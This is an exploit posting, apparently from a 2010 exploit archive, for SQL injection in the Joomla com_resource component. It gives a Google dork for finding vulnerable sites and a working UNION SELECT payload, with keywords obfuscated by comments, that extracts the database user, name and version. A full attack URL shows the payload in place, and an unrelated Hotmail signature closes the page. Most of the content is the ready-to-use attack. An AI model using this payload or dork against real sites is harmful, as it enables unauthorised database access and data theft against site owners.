The Joomla Resource component suffers from a remote SQL injection vulnerability.
a8e65f0cce3089ac7a86b99914368a80cee10e448cd2d7977718c0661ebf1478
[!] Title: Joomla Component com_resource SQL Injection
[!] Date: 16.05.2010
[!] Author: ByEge
[!] Homepage: byege.blogspot.com
[+]#####################################################################################[+]
[!] Google Dork : inurl:com_resource
[!] ExploiT :
-3/**/uNIOn/**/sELECt/**/1,2,3,concat_ws(char(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/**/--
[!] Example :
https://localhost.free/index.php?option=com_resource&view=single&cid[]=-3/**/uNIOn/**/sELECt/**/1,2,3,concat_ws(char(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/**/--
[+]#####################################################################################[+]
[!] Th4nks : Fantastik, MitolocyA, ISYAN,
_________________________________________________________________
Hotmail: Microsoft’un güçlü İSTENMEYEN POSTA koruması ile güvenilir e-posta.
https://signup.live.com/signup.aspx?id=60969